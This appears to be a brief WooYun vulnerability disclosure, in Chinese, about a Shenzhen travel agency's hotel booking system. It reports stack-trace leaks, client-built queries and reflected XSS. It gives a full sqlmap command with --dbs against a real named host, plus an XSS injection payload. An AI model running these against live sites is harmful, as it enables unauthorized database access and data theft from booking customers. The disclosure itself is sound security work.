WooYun.org

看到 WooYun: 深圳市某旅行社订房系统110W+开房信息泄露 里的描述就试了一下，结果发现一系列问题。
1.当改变selectorderrequestid参数值为非int值或没有记录的int值的时候，页面会有错误的堆栈信息，分别为java.lang.NullPointerException、NumberFormatException

出现这种情况说明系统还存在很多问题。
2.在这个页面发现js/framework.js文件

在页面构造查询条件，然后提交到数据库？这样岂不是有sql注入的问题。
但是这个系统对于外网访问似乎限制很多，于是在百度上搜了下：捷旅，用这个系统的还挺多。
经测试下面这个网站存在sql注入漏洞，构造sqlmap:python sqlmap.py -u "http://hz.jlfzg.com:6372/booking/bookingAction!hotelIndex.action" --data "star=55&priceSearchValue=0&currentPage=1&selectEventId=82&salebyareaid=&hotelid=&roomtypeid=&hotelSearchJson=mon_bx" --dbs --threads=3

3.在页面搜索的地方存在反射型xss
输入" onfocus="javascript:alert(1)"